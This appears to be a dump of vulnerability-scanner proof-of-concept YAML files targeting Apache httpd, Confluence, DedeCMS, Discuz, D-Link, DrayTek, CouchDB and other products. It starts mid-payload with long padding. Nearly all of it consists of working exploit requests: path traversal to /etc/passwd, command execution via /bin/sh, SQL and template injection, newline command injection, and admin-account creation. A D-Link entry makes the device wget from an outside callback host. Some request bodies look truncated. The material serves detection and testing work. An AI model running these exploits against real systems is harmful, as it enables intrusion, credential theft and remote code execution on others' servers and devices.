AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
follow_redirects: false
expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
expression: r0()
detail:
author: Jarcis-cy(https://github.com/Jarcis-cy)
links:
- https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
================================================
FILE: pocs/apache-httpd-cve-2021-41773-path-traversal.yml
================================================
name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
manual: true
transport: http
rules:
cgibin0:
request:
cache: true
method: GET
path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
icons0:
request:
cache: true
method: GET
path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
expression: cgibin0() || icons0()
detail:
author: JingLing(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
================================================
FILE: pocs/apache-httpd-cve-2021-41773-rce.yml
================================================
name: poc-yaml-apache-httpd-cve-2021-41773-rce
manual: true
transport: http
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
r0:
request:
cache: true
method: POST
path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
body: echo;expr {{r1}} + {{r2}}
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
================================================
FILE: pocs/apache-kylin-unauth-cve-2020-13937.yml
================================================
name: poc-yaml-apache-kylin-unauth-cve-2020-13937
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /kylin/api/admin/config
expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
expression: r0()
detail:
author: JingLing(github.com/shmilylty)
links:
- https://s.tencent.com/research/bsafe/1156.html
================================================
FILE: pocs/apache-nifi-api-unauthorized-access.yml
================================================
name: poc-yaml-apache-nifi-api-unauthorized-access
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /nifi-api/flow/current-user
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
expression: r0()
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
================================================
FILE: pocs/apache-ofbiz-cve-2018-8033-xxe.yml
================================================
name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /webtools/control/xmlrpc
headers:
Content-Type: application/xml
body: ]>&disclose; {{rand}} dwisiswant0 contextConfigLocation ")
expression: r0()
detail:
author: sharecast
links:
- https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
================================================
FILE: pocs/confluence-cve-2021-26084.yml
================================================
name: poc-yaml-confluence-cve-2021-26084
manual: true
transport: http
set:
r1: randomInt(100000, 999999)
r2: randomInt(100000, 999999)
rules:
r0:
request:
cache: true
method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()
detail:
author: Loneyer(https://github.com/Loneyers)
links:
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
================================================
FILE: pocs/confluence-cve-2021-26085-arbitrary-file-read.yml
================================================
name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
manual: true
transport: http
set:
rand: randomLowercase(6)
rules:
r0:
request:
cache: true
method: GET
path: /s/{{rand}}/_/;/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"Confluence ") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
expression: r0()
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
================================================
FILE: pocs/consul-rexec-rce.yml
================================================
name: poc-yaml-consul-rexec-rce
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /v1/agent/self
expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")'
expression: r0()
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46073
================================================
FILE: pocs/consul-service-rce.yml
================================================
name: poc-yaml-consul-service-rce
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /v1/agent/self
expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")'
expression: r0()
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46074
================================================
FILE: pocs/coremail-cnvd-2019-16798.yml
================================================
name: poc-yaml-coremail-cnvd-2019-16798
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(""))
expression: r0()
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://www.secpulse.com/archives/107611.html
================================================
FILE: pocs/couchcms-cve-2018-7662.yml
================================================
name: poc-yaml-couchcms-cve-2018-7662
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /includes/mysql2i/mysql2i.func.php
follow_redirects: false
expression: 'response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")'
r1:
request:
cache: true
method: GET
path: /addons/phpmailer/phpmailer.php
follow_redirects: false
expression: 'response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")'
expression: r0() && r1()
detail:
author: we1x4n(https://we1x4n.github.io/)
links:
- https://github.com/CouchCMS/CouchCMS/issues/46
================================================
FILE: pocs/couchdb-cve-2017-12635.yml
================================================
name: poc-yaml-couchdb-cve-2017-12635
manual: true
transport: http
set:
r1: randomLowercase(32)
rules:
r0:
request:
cache: true
method: PUT
path: /_users/org.couchdb.user:{{r1}}
headers:
Content-Length: "192"
Content-Type: application/json
body: |-
{
"type": "user",
"name": "{{r1}}",
"roles": ["_admin"],
"roles": [],
"password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
}
follow_redirects: false
expression: response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
expression: r0()
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
================================================
FILE: pocs/couchdb-unauth.yml
================================================
name: poc-yaml-couchdb-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /_config
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
expression: r0()
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.seebug.org/vuldb/ssvid-91597
================================================
FILE: pocs/craftcms-seomatic-cve-2020-9757-rce.yml
================================================
name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
poc10:
request:
cache: true
method: GET
path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
poc20:
request:
cache: true
method: GET
path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
expression: poc10() || poc20()
detail:
author: x1n9Qi8
links:
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
================================================
FILE: pocs/dahua-cve-2021-33044-authentication-bypass.yml
================================================
name: poc-yaml-dahua-cve-2021-33044-authentication-bypass
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /RPC2_Login
body: '{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}'
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(b"{\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\"")
expression: r0()
detail:
author: For3stCo1d (https://github.com/For3stCo1d)
description: "dahua-authentication-bypass"
links:
- https://seclists.org/fulldisclosure/2021/Oct/13
- https://github.com/dorkerdevil/CVE-2021-33044
================================================
FILE: pocs/datang-ac-default-password-cnvd-2021-04128.yml
================================================
name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /login.cgi
body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
follow_redirects: false
expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
expression: r0()
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128
================================================
FILE: pocs/dedecms-carbuyaction-fileinclude.yml
================================================
name: poc-yaml-dedecms-carbuyaction-fileinclude
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=alipay
follow_redirects: true
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=cod
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
expression: r0() && r1()
detail:
author: harris2015(https://github.com/harris2015)
links:
- https://www.cnblogs.com/milantgh/p/3615986.html
Affected Version: DedeCmsV5.x
================================================
FILE: pocs/dedecms-cve-2018-6910.yml
================================================
name: poc-yaml-dedecms-cve-2018-6910
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /include/downmix.inc.php
expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
expression: r0()
detail:
author: PickledFish(https://github.com/PickledFish)
links:
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
================================================
FILE: pocs/dedecms-cve-2018-7700-rce.yml
================================================
name: poc-yaml-dedecms-cve-2018-7700-rce
manual: true
transport: http
set:
r: randomInt(2000000000, 2100000000)
rules:
r0:
request:
cache: true
method: GET
path: /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
expression: r0()
detail:
author: harris2015(https://github.com/harris2015)
links:
- https://xz.aliyun.com/t/2224
Affected Version: V5.7SP2正式版(2018-01-09)
================================================
FILE: pocs/dedecms-guestbook-sqli.yml
================================================
name: poc-yaml-dedecms-guestbook-sqli
manual: true
transport: http
set:
r: randomInt(800000000, 1000000000)
rules:
r0:
request:
cache: true
method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: response.status == 200
output:
search: '"action=admin&id=(?P\\d{1,20})".bsubmatch(response.body)'
articleid: search["articleid"]
r1:
request:
cache: true
method: GET
path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email='
follow_redirects: true
expression: response.status == 200
r2:
request:
cache: true
method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
expression: r0() && r1() && r2()
detail:
author: harris2015(https://github.com/harris2015)
links:
- https://blog.csdn.net/god_7z1/article/details/8180454
Affected Version: "5.7"
================================================
FILE: pocs/dedecms-membergroup-sqli.yml
================================================
name: poc-yaml-dedecms-membergroup-sqli
manual: true
transport: http
set:
r: randomInt(800000000, 1000000000)
rules:
r0:
request:
cache: true
method: GET
path: /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
expression: r0()
detail:
author: harris2015(https://github.com/harris2015)
links:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
Affected Version: 5.6,5.7
================================================
FILE: pocs/dedecms-url-redirection.yml
================================================
name: poc-yaml-dedecms-url-redirection
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
follow_redirects: false
expression: response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
expression: r0()
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://blog.csdn.net/ystyaoshengting/article/details/82734888
Affected Version: V5.7 sp1
================================================
FILE: pocs/discuz-ml3x-cnvd-2019-22239.yml
================================================
name: poc-yaml-discuz-ml3x-cnvd-2019-22239
manual: true
transport: http
set:
r1: randomInt(800000000, 1000000000)
rules:
r0:
request:
cache: true
method: GET
path: /forum.php
follow_redirects: false
expression: response.status == 200
output:
search: '"cookiepre = ''(?P[\\w_]+)''".bsubmatch(response.body)'
token: search["token"]
r1:
request:
cache: true
method: GET
path: /forum.php
headers:
Cookie: '{{token}}language=sc''.print(md5({{r1}})).'''
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
detail:
author: X.Yang
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239
Discuz_version: Discuz!ML 3.x
================================================
FILE: pocs/discuz-v72-sqli.yml
================================================
name: poc-yaml-discuz-v72-sqli
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
follow_redirects: false
expression: 'response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info: MySQL Query Error")'
expression: r0()
detail:
author: leezp
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606
Affected Version: discuz <=v7.2
vuln_url: /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20
================================================
FILE: pocs/discuz-wechat-plugins-unauth.yml
================================================
name: poc-yaml-discuz-wechat-plugins-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /plugin.php?id=wechat:wechat&ac=wxregister
follow_redirects: false
expression: response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
expression: r0()
detail:
author: JrD
links:
- https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
================================================
FILE: pocs/discuz-wooyun-2010-080723.yml
================================================
name: poc-yaml-discuz-wooyun-2010-080723
manual: true
transport: http
set:
rand: randomInt(200000000, 210000000)
rules:
r0:
request:
cache: true
method: GET
path: /viewthread.php?tid=10
headers:
Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
expression: r0()
detail:
author: Loneyer
links:
- https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723
version: Discuz 7.x/6.x
================================================
FILE: pocs/dlink-850l-info-leak.yml
================================================
name: poc-yaml-dlink-850l-info-leak
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml OK ")
expression: r0()
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://xz.aliyun.com/t/2941
Affected Version: Dir-850L
================================================
FILE: pocs/dlink-cve-2019-16920-rce.yml
================================================
name: poc-yaml-dlink-cve-2019-16920-rce
manual: true
transport: http
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
r0:
request:
cache: true
method: POST
path: /apply_sec.cgi
headers:
Content-Type: application/x-www-form-urlencoded
body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
follow_redirects: true
expression: response.status == 200 && reverse.wait(5)
expression: r0()
detail:
author: JingLing(https://hackfun.org/)
links:
- https://www.anquanke.com/post/id/187923
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
================================================
FILE: pocs/dlink-cve-2019-17506.yml
================================================
name: poc-yaml-dlink-cve-2019-17506
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"")
expression: r0()
detail:
author: l1nk3r,Huasir(https://github.com/dahua966/)
links:
- https://xz.aliyun.com/t/6453
================================================
FILE: pocs/dlink-cve-2020-25078-account-disclosure.yml
================================================
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /config/getuser?index=0
follow_redirects: false
expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
expression: r0()
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
================================================
FILE: pocs/dlink-cve-2020-9376-dump-credentials.yml
================================================
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"Admin ") && response.body.bcontains(b"") && response.body.bcontains(b" ")
expression: r0()
detail:
author: x1n9Qi8
links:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
Affected Version: Dlink DIR-610
================================================
FILE: pocs/dlink-dsl-2888a-rce.yml
================================================
name: poc-yaml-dlink-dsl-2888a-rce
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /page/login/login.html
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";")
r1:
request:
cache: true
method: POST
path: /
headers:
Content-Type: application/x-www-form-urlencoded
body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
follow_redirects: false
expression: response.status == 302 && response.headers["location"] == "/page/login/login_fail.html"
r2:
request:
cache: true
method: GET
path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)")
expression: r0() && r1() && r2()
detail:
author: mvhz81
links:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE
================================================
FILE: pocs/docker-api-unauthorized-rce.yml
================================================
name: poc-yaml-docker-api-unauthorized-rce
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /info
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
expression: r0()
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce
================================================
FILE: pocs/docker-registry-api-unauth.yml
================================================
name: poc-yaml-docker-registry-api-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /v2/
follow_redirects: false
expression: response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
r1:
request:
cache: true
method: GET
path: /v2/_catalog
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
expression: r0() && r1()
detail:
author: p0wd3r
links:
- http://www.polaris-lab.com/index.php/archives/253/
================================================
FILE: pocs/dotnetcms-sqli.yml
================================================
name: poc-yaml-dotnetcms-sqli
manual: true
transport: http
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(1, 100)
rules:
r0:
request:
cache: true
method: GET
path: /user/City_ajax.aspx
follow_redirects: false
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
detail:
links:
- https://www.cnblogs.com/rebeyond/p/4951418.html
- http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
Affected Version: v1.0~v2.0
================================================
FILE: pocs/draytek-cve-2020-8515.yml
================================================
name: poc-yaml-draytek-cve-2020-8515
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /cgi-bin/mainfunction.cgi
headers:
Content-Type: text/plain; charset=UTF-8
body: action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
expression: r0()
detail:
author: Soveless(https://github.com/Soveless)
links:
- https://github.com/imjdl/CVE-2020-8515-PoC
Affected Version: Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2
================================================
FILE: pocs/druid-monitor-unauth.yml
================================================
name: poc-yaml-druid-monitor-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /druid/index.html
